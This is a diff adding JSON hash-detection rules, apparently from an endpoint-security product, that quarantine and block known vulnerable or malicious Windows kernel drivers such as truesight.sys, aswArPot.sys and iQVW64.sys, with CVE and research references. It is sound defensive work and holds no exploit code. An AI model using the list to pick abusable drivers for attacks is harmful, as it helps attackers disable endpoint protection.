+ "id": "44bc1f4e-ebf3-51d5-b086-d7b2b200afa6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822817Z",
+ "creation_date": "2026-03-23T11:45:31.822820Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822829Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3cba4367e05c7155638ee729e00f6cb42d35088316c62fa9cfea18a2b1af4d04",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "44c3bbc6-6281-5ee9-b4d5-d7243f2480ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615220Z",
+ "creation_date": "2026-03-23T11:45:29.615222Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7334c46a55acf8bb18435ab60ed9b89f2c1ab31587ef052730358efc32fddb62",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "44c56f4d-5b4f-5634-ad0c-5f6667c902c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488431Z",
+ "creation_date": "2026-03-23T11:45:31.488433Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488438Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c57561416c054c66190056ca3a8633d6123d51f3e8c9cd032545938326f22cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "44e44eec-6c72-54f4-8633-bfc852f8dad5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968740Z",
+ "creation_date": "2026-03-23T11:45:29.968742Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968748Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb8aef4049f78c3ca1c0808b95a8d3f975e00e1b570b890d1d5915e1e804574e",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "44ecf641-4932-55d7-bbe2-48e84ed5f4a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817768Z",
+ "creation_date": "2026-03-23T11:45:30.817771Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817779Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8e047a7c96a94eb7cf0416253eca48fa7ba66914b684ee75e81651c83c7ac30",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45014412-5e9f-5477-8bf9-7c2fd94ffc25",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156380Z",
+ "creation_date": "2026-03-23T11:45:31.156382Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156387Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ded7a01c322d1a61683b93b9f2aec35c2a2d98f7bb4aad2ffa9ba6138d7276cc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4505253a-eb61-5ab1-be9c-0ed335a9d6bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492853Z",
+ "creation_date": "2026-03-23T11:45:31.492856Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492865Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65181921bd04e45ef68257afad11f3f22a864d80e7fea5dcf74f8e7cf40d59e2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45076210-e771-5434-8038-ad17af824194",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142541Z",
+ "creation_date": "2026-03-23T11:45:31.142543Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9d8ba7a075bbf1085f34d64dc9225b85be30f6a61b297203db23c484878d903",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "450e0efd-0e8d-5b5a-a9a2-8dcc0e95993a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834786Z",
+ "creation_date": "2026-03-23T11:45:30.834789Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834798Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a654e7f84e3589acb475f3962c2cf00f2f15e523ec931b11b57bdeb292981255",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "451aa41f-6b39-5662-a56b-c5619061b098",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160439Z",
+ "creation_date": "2026-03-23T11:45:31.160441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54e230432e4bd8adaff7afdb4f3a0118b348b81697998701fee1018ba180e554",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45212cfa-e44f-5ace-ae21-f7d5edfd09af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477112Z",
+ "creation_date": "2026-03-23T11:45:30.477115Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477125Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f15fd9b81092a98fabcc4ac95e45cec2d9ff3874d2e3faac482f3e86edad441",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4539174d-5cf9-53df-95fc-167ea0515560",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979533Z",
+ "creation_date": "2026-03-23T11:45:29.979535Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979540Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f936ec4c8164cbd31add659b61c16cb3a717eac90e74d89c47afb96b60120280",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "453ee8e1-bdb8-5a4f-867a-3de858e9a833",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456839Z",
+ "creation_date": "2026-03-23T11:45:30.456842Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456851Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c79a2bb050af6436b10b58ef04dbc7082df1513cec5934432004eb56fba05e66",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45586c36-5229-5c5f-8787-694a0834f01b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478484Z",
+ "creation_date": "2026-03-23T11:45:30.478487Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d1bd2235d422954506b1bdb3070d9d8bada3fb7f9e4f658036031294b3a95df",
+ "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4562f796-91e0-5602-a4d0-30da2dbb8fc4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968185Z",
+ "creation_date": "2026-03-23T11:45:29.968187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968192Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374",
+ "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4565b1bc-7f92-58aa-803e-e954df29e81c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481823Z",
+ "creation_date": "2026-03-23T11:45:30.481825Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481831Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c79e5196c2f51d2ab16e40b9d5725a8bf6ae0aaa70b02377aedc0f4e93ca37f",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4569b94a-8fca-5edd-9cbf-9c0626eafc44",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972266Z",
+ "creation_date": "2026-03-23T11:45:29.972268Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972273Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46ec6310c5ea5e289299d40f5ecca82b9c722ffc766dfd08f36dc88835e63567",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "456cec38-b53f-5ae3-a145-2908ebfdd8f2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819812Z",
+ "creation_date": "2026-03-23T11:45:30.819814Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819820Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d633055c7eda26dacfc30109eb790625519fc7b0a3a601ceed9e21918aad8a1b",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "457eabaa-fe04-5090-89b5-5f2cd7bd3e36",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823899Z",
+ "creation_date": "2026-03-23T11:45:30.823901Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823907Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bfb584ae2dd1bba593ac142b6c9a1a2640955759b72123ee7b58f8eaaa9f748",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45887fa2-ce12-5791-9b0c-e836976d9a9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827622Z",
+ "creation_date": "2026-03-23T11:45:31.827624Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827630Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1d560040819f308d820032547d9ad1cf11fdfbb400241bf877e6f5e51900710",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "459189c9-317c-5e00-ae48-ba457e6a168b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815197Z",
+ "creation_date": "2026-03-23T11:45:31.815199Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815204Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "571c3cebc7009f1243b97dd381962e78d736b209955f8c2e5a30d970c155f3f7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45af8571-3d48-525f-b480-ffa43e8a14aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827380Z",
+ "creation_date": "2026-03-23T11:45:30.827382Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827387Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b366e96694d76b1947ed0e22b574f39cbe0b6d352851b720825b8a0df1aafa51",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45b0f535-3779-51fb-a9d2-9678488937b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
